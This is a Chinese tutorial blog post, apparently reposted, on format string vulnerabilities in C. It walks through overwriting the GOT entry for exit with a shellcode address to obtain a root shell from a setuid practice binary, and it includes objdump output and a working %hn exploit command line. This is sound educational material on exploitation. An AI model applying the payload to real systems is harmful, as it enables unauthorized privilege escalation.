c语言格式化字符漏洞,格式化字符串漏洞

最新推荐文章于 2024-04-14 21:08:43 发布
最新推荐文章于 2024-04-14 21:08:43 发布
阅读量155 收藏
点赞数
文章标签: c语言格式化字符漏洞

可能会有人问能不能通过这种漏洞来getshell呢,答案是可以的,且方法不止一种,下面介绍一种相对来说简单且常用的方法,通过覆盖GOT表方法来getshell的trick,总体的思路就是程序最后要执行exit函数,我们覆盖exit函数的地址为shellcode的地址来达到getshell的目的。

我们知道一个程序可以使用共享库,那么它必然有一个存放了各个函数对应的地址的表,这个表就是PLT(procedure linkage table)。

使用objdump 查看plt section

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47xxx@ubuntu:~/Desktop/pwntest/formatstringexp$ objdump -d -j .plt ./fmt_vuln

./fmt_vuln: file format elf32-i386

Disassembly of section .plt:

08048360 :

8048360:ff 35 04 a0 04 08 pushl 0x804a004

8048366:ff 25 08 a0 04 08 jmp *0x804a008

804836c:00 00 add %al,(%eax)

...

08048370 :

8048370:ff 25 0c a0 04 08 jmp *0x804a00c

8048376:68 00 00 00 00 push $0x0

804837b:e9 e0 ff ff ff jmp 8048360 <_init>

08048380 :

8048380:ff 25 10 a0 04 08 jmp *0x804a010

8048386:68 08 00 00 00 push $0x8

804838b:e9 d0 ff ff ff jmp 8048360 <_init>

08048390 :

8048390:ff 25 14 a0 04 08 jmp *0x804a014

8048396:68 10 00 00 00 push $0x10

804839b:e9 c0 ff ff ff jmp 8048360 <_init>

080483a0 <__gmon_start__>:

80483a0:ff 25 18 a0 04 08 jmp *0x804a018

80483a6:68 18 00 00 00 push $0x18

80483ab:e9 b0 ff ff ff jmp 8048360 <_init>

080483b0 :

80483b0:ff 25 1c a0 04 08 jmp *0x804a01c

80483b6:68 20 00 00 00 push $0x20

80483bb:e9 a0 ff ff ff jmp 8048360 <_init>

080483c0 <__libc_start_main>:

80483c0:ff 25 20 a0 04 08 jmp *0x804a020

80483c6:68 28 00 00 00 push $0x28

80483cb:e9 90 ff ff ff jmp 8048360 <_init>

080483d0 :

80483d0:ff 25 24 a0 04 08 jmp *0x804a024

80483d6:68 30 00 00 00 push $0x30

80483db:e9 80 ff ff ff jmp 8048360 <_init>

如上所示可以看到exit函数的相关跳转,但是这个plt section是READONLY即只读不可修改的

1

2

3xxx@ubuntu:~/Desktop/pwntest/formatstringexp$ objdump -h ./fmt_vuln | grep -A1 "\ .plt\ "

11 .plt 00000080 08048360 08048360 00000360 2**4

CONTENTS, ALLOC, LOAD, READONLY, CODE

但如果仔细看的话,可以知道jmp *0x804a01c 中的jmp地址并不是一个直接的地址,而是一个指针指向的地址,即exit函数的地址是存放在地址0x804a01c处的。

这些个地址是存在放另外的section的,叫做global offset table(GOT),它是可写的。然后通过objdump可以获取的到。

4244774a0a25faf78d0d4aa90b3d8451.png

如上说明exit函数是在0x0804a01c这个地址上的。

1./fmt_vuln $(printf "\x1e\xa0\x04\x08\x1c\xa0\x04\x08")%49143x%4\$hn%12981x%5\$hn

这次我们还是将shellcode放入到环境变量中,然后将exit函数的地址指向shellcode所存放的环境变量(这种一般是用在提权操作上,普通用户运行了setuid的程序)

6f4ab9b5e56120cdf994369cec5342bf.png

eff25d39dfded7ec5a5c9535e5c67b47.png

如上,当程序调用exit函数的时候,通过PLT跳转并在GOT表中获取到了调用的地址,由于这个地址已经被修改为shellcode的入口地址,所以我们就获取到了root权限的shell。

可以写任意地址其实就提供了很多种可能性,只要是可写的内存且包含了程序执行流的都可以是写入的目标。

其它

这里就主要过程做了说明,想要真正理解还需要自己动手去实践。

github repo

Reference

《Hacking the art of exploitation》0x352

庸常反复的梦
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
格式化字符串漏洞
小王的储物间
12-15 740
究竟在什么地方结束,也就是说,它不知道参数的个数。point : 实际偏移量注意64位算偏移时要先将调用约定中寄存器的数量加进去,并且payload里地址之前的其他格式化字符串也会在栈上占去位置,会导致实际偏移量增加,需要进行新的计算,假如无法确定%K$n中的K到底是多少,可以多输出几个%p来确定。内存覆盖的思路和任意地址泄露的思路相似,一种可行的方法是同上面一样,构造payload,在格式化字符串中包含想要写入的地址,此时该地址会随格式化字符串放在栈上,然后用格式化字符串的’%K$n’来实现写功能。
Python字符串格式化
09-21
其中,`%`操作符是早期Python版本中最常见的字符串格式化方法之一,它的使用方式类似于C语言中的`printf`函数。 #### 二、基本概念 ##### 2.1 格式化操作符(%) 在Python中,`%`操作符用于字符串格式化。该操作符...
C语言常见漏洞-格式化字符串漏洞
qq_44370676的博客
07-21 3201
漏洞类型一.格式化字符串漏洞1.1 预备知识1.2 漏洞产生机理 一.格式化字符串漏洞 1.1 预备知识 在c语言中的printf,fprintf,sprintf,snprintf等print函数经常会用到类似%形式的一个或者多个说明符。比如printf("my name is %s",panghu);中的%s。 说明符如下 说明符 注释 %d 以十进制整数的格式输出 %s 以字符串的的格式输出 %x 以十六进制数的格式输出 %c 以字符的格式输出 %p 以指针的格式输出
c语言密码字符串比较的漏洞,C语言格式化字符串漏洞
weixin_28691441的博客
05-18 202
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?格式化字符串学习C语言的过程中几乎都会使用到格式化字符串的输入和输出,例如:123456int (void){printf("My name is %s.n","Cruise");printf("I am %d years old.","18");return 0;}运行程序会得到输出:12My name is Crui...
C语言格式化输入输出函数详解
01-21
1、调用形式一般为:printf(“格式化控制字符串”,输出表列); 2、格式化控制字符串用于指定输出格式,它有三种形式: 1、格式说明符:规定了相应输出表列内容的输出格式,以%打头,如%d、%o等 2、转义字符:用来...
C语言格式化字符串的输出格式
08-04
C语言格式化字符串的输出格式 C语言格式化字符串的输出格式是指在C语言编程中使用printf函数输出字符串的格式。printf函数是C语言标准库中的一个函数,用于将格式化字符串输出到标准输出流中。 printf函数的...
占位符%字符串格式化输出 – python实例
12-21
使用`%`时,我们需要一个格式化字符串,其中包含占位符,如`%s`、`%d`等,以及一个或多个变量或容器,这些变量的值将替换占位符。例如: ```python name = 'Jack' age = 18 print('%s is %d years old.'%(name, age...
格式化字符串格式化字符串格式化字符串
05-18
在编程领域,格式化字符串是一种常见的操作,它允许我们将动态数据插入到预定义的文本模板中,以便生成具有特定结构的输出。这个过程通常涉及到字符串的拼接、变量的替换或者按照特定的规则来组织输出内容。在各种...
c语言编程中常见的陷阱和漏洞
05-19
介绍c语言中一些容易被忽视的陷阱和漏洞,对于提高编程能力有很大帮助
格式化字符串漏洞利用 二、格式化函数
热门推荐
龙哥盟
04-12 3万+
二、格式化函数格式化函数是一类特殊的 ANSI C 函数,接受可变数量的参数,其中的一个就是所谓的格式化字符串。当函数求解格式化字符串时,它会访问向函数提供的额外参数。它是一个转换函数,用于将原始的 C 数据类型表示为人类可读的字符串形式。它们在几乎任何 C 程序中都会使用,来输出信息、打印错误信息或处理字符串。这一章中,我们会涵盖格式化函数使用中的典型漏洞,正确用法,它们的一些参数,以及格式化字符
格式化字符漏洞
IT_huanhuan的博客
05-25 1148
格式化字符串是由普通字符(包括%)和转换规则构成的字符序列。普通字符被原封不动地复制到输出流中。转换规则根据与实参对应的转换指示符对其进行转换,然后将结果写入到输出流中。转换规则由可选的部分和必选部分组成。其中只有转换指示符type是必选部分,用来表示转换类型。用 printf() 为例,它的第一个参数就是格式化字符串 :“Color %s,Number %d,Float %4.2f”然后 printf 函数会根据这个格式化字符串来解析对应的其他参数。
漏洞挖掘基础之格式化字符串
stonesharp的专栏
01-10 2223
漏洞挖掘基础之格式化字符串  黑客  1年前 (2015-10-24)  8,036  0 0x00 序 格式化字符串漏洞是一个很古老的漏洞了,现在几乎已经见不到这类漏洞的身影,但是作为漏洞分析的初学者来说,还是很有必要研究一下的,因为这是基础啊!!!所以就有了今天这篇文章。我文章都写好了,就差你来跟我搞二进制了!%>. 0x01 基础知识---栈
格式化字符串漏洞学习笔记
最新发布
weixin_61967363的博客
04-14 544
该文章详细介绍了格式化字符串溢出漏洞的形成和利用,文章包含了格式化字符串漏洞的利用代码和讲解
3.Python学习笔记:[字符串格式化输出;exit('')的使用; for语句]
baiqz0401的博客
06-16 148
字符串格式化输出:   %s  占位符   %d  整数   %f  浮点数 name=input('你的姓名:') age=int(input('你的年龄:')) job=input('你的工作:') salary=input('你的薪水:') msg=''' ------------info of %s----------- name:%s age:%d ...
linux 反编译 obj,objdump反汇编
weixin_39869733的博客
05-11 435
objdump -j .text -Sl stack1 | more-S 尽可能反汇编出源代码,尤其当编译的时候指定了-g这种调试参数时,效果比较明显。隐含了-d参数。-l 用文件名和行号标注相应的目标代码,仅仅和-d、-D或者-r一起使用使用-ld和使用-d的区别不是很大,在源码级调试的时候有用,要求编译时使用了-g之类的调试编译选项。-j name 仅仅显示指定section的信息这是按Sec...
Windows堆溢出与格式化字符串漏洞利用深度解析
本文将深入探讨Windows平台下的两种关键漏洞利用技术:堆溢出和格式化字符串漏洞。堆溢出是针对内存管理中的缺陷,特别是当程序动态分配的堆内存超出其预期大小时,可能导致数据溢出到相邻的内存区域。作者强调,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值